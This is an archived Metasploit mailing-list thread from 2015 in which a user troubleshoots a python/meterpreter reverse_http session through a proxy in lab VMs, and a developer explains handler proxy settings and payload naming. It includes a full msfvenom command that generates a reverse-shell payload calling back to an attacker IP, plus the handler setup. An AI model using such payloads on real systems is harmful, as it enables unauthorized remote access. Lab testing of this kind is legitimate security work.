Metasploit mailing list archives
Re: framework Digest, Vol 83, Issue 2
From: Spencer McIntyre <zerosteiner () gmail com>
Date: Wed, 04 Mar 2015 18:14:22 +0000
Mike Jones! No, the python part of python/meterpreter/reverse_http is the platform so all the stages compatible with it python/*/reverse_http are all in python. There is only a meterpreter stage for python, but the naming rule of platform/stage/stager goes for the other payloads as well such as windows/meterpreter/reverse_http. Also note there there is sometimes an architecture after the platform, ie linux/x86/*. Because you're using a python payload it will never respond with an ELF file in the stage. You may want to look at the linux/x86/meterpreter/reverse_tcp payload instead. It still will not send a full ELF header in the stage but the payload itself will be a native meterpreter for your debian systems. There's some good info on how payloads are named and work in the wiki here: https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work. Spencer On Wed, Mar 4, 2015 at 1:00 PM <framework-request () spool metasploit com> wrote:
Send framework mailing list submissions to framework () spool metasploit com To subscribe or unsubscribe via the World Wide Web, visit https://dev.metasploit.com/mailman/listinfo/framework or, via email, send a message with subject or body 'help' to framework-request () spool metasploit com You can reach the person managing the list at framework-owner () spool metasploit com When replying, please edit your Subject line so it is more specific than "Re: Contents of framework digest..." Today's Topics: 1. Re: framework Digest, Vol 83, Issue 1 (Spencer McIntyre) 2. Re: framework Digest, Vol 83, Issue 1 (Mike Jones!) ---------------------------------------------------------------------- Message: 1 Date: Tue, 03 Mar 2015 18:47:31 +0000 From: Spencer McIntyre <zerosteiner () gmail com> To: framework () spool metasploit com Subject: Re: [framework] framework Digest, Vol 83, Issue 1 Message-ID: <CAMKhuE-KC09sxNB84Bvk-C3ZHM13UdCtrCTB5r0ETNfAPsUjyQ@ mail.gmail.com> Content-Type: text/plain; charset="utf-8" Mike Jones! The PROXYHOST and PROXYPORT must also be set in the handler. This is because when the stage is sent, the proxy settings are patched in by the instance of Metasploit running on the attackers system when it is requested by the stager. Because of this, it's necessary to set the PROXYHOST and PROXYPORT options to the same values on the handler as was specified when creating the payload with msfvenom. If when the proxy options are set the session still does not respond, it's possible there is another issue and opening a ticket on GitHub with the output would be helpful for tracking. https://github.com/rapid7/metasploit-framework/issues I hope that helps Mike Jones! On Tue, Mar 3, 2015 at 1:00 PM <framework-request () spool metasploit com> wrote:Send framework mailing list submissions to framework () spool metasploit com To subscribe or unsubscribe via the World Wide Web, visit https://dev.metasploit.com/mailman/listinfo/framework or, via email, send a message with subject or body 'help' to framework-request () spool metasploit com You can reach the person managing the list at framework-owner () spool metasploit com When replying, please edit your Subject line so it is more specific than "Re: Contents of framework digest..." Today's Topics: 1. python/meterpreter/reverse_http timeout (Mike Jones!) ---------------------------------------------------------------------- Message: 1 Date: Mon, 2 Mar 2015 12:35:01 -0800 From: "Mike Jones!" <property.of.mike.jones () gmail com> To: framework <framework () spool metasploit com> Subject: [framework] python/meterpreter/reverse_http timeout Message-ID: <CAGZNKFsAxyymTa=LBa9KrK+JxeceyLT6nUU1wrhWXzxiU7YtEQ@mail. gmail.com> Content-Type: text/plain; charset="utf-8" I'm testing payloads through a proxy in my VMs and can't get any meterpreter commands to work after the session opens. All VMs arerunningDebian. Victim: 10.17.24.128 Proxy: 10.17.24.10 and 172.16.22.10 (running Squid) Attacker: 172.16.22.22 I've generated a payload with msfvenom: msfvenom -p python/meterpreter/reverse_http LHOST=172.16.22.22LPORT=8080PROXYHOST=10.17.24.10 PROXYPORT=3128 Set up a handler: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD python/meterpreter/reverse_http PAYLOAD => python/meterpreter/reverse_http msf exploit(handler) > set LHOST 172.16.22.22 LHOST => 172.16.22.22 msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > exploit -j Executing the payload on the victim looks fine. Session hits on metasploit, and I can interact with it but none of the commands respond: msf exploit(handler) > [*] 172.16.22.10:52399 Request received for /x5LW... [*] Meterpreter session 1 opened (172.16.22.22:8080 ->172.16.22.10:52399)at 2015-03-02 14:12:10 -0600 sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter python/python 172.16.22.22:8080 -> 172.16.22.10:52399 (172.16.22.10) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ps [-] Error running command ps: Rex::TimeoutError Operation timed out. I tried setting up the handler with and without PROXYHOST and PROXYPORT, neither way worked, though I suspect without those values is the correct approach. What am I missing? Thanks in advance. -------------- next part -------------- An HTML attachment was scrubbed... URL: <https://dev.metasploit.com/pipermail/framework/attachments/ 20150302/3f873c79/attachment-0001.html> ------------------------------ Subject: Digest Footer _______________________________________________ framework mailing list framework () spool metasploit com https://dev.metasploit.com/mailman/listinfo/framework ------------------------------ End of framework Digest, Vol 83, Issue 1 ****************************************-------------- next part -------------- An HTML attachment was scrubbed... URL: <https://dev.metasploit.com/pipermail/framework/ attachments/20150303/bbcd6294/attachment-0001.html> ------------------------------ Message: 2 Date: Tue, 3 Mar 2015 16:51:11 -0800 From: "Mike Jones!" <property.of.mike.jones () gmail com> To: Spencer McIntyre <zerosteiner () gmail com> Cc: framework <framework () spool metasploit com> Subject: Re: [framework] framework Digest, Vol 83, Issue 1 Message-ID: <CAGZNKFvDjfRdC_ceDMWJAYvPYkmgtWzdZ3iO6S6yhag1 DB_psw () mail gmail com> Content-Type: text/plain; charset="utf-8" Thanks for the reply, Spencer. Your explanation makes sense. I found what is probably another issue with my setup: Meterpreter is sending a Windows executable across in the stage. After setting PROXYHOST and PROXYPORT, msfconsole would see the connection and begin sending the stage but then hang. I started sniffing on the proxy to see what was going on and noticed an MZ stub and PE header go by. I'm guessing that won't work with all the systems involved running Debian. I looked for an ELF header but didn't see one. Is there any way to get metasploit to serve up an ELF in the stage while still using python/meterpreter/reverse_http? Sorry if this is a completely stupid question -- I am pretty inexperienced with metasploit as you can tell. -------------- next part -------------- An HTML attachment was scrubbed... URL: <https://dev.metasploit.com/pipermail/framework/ attachments/20150303/816a98aa/attachment-0001.html> ------------------------------ Subject: Digest Footer _______________________________________________ framework mailing list framework () spool metasploit com https://dev.metasploit.com/mailman/listinfo/framework ------------------------------ End of framework Digest, Vol 83, Issue 2 ****************************************
_______________________________________________ https://dev.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: framework Digest, Vol 83, Issue 2 Spencer McIntyre (Mar 04)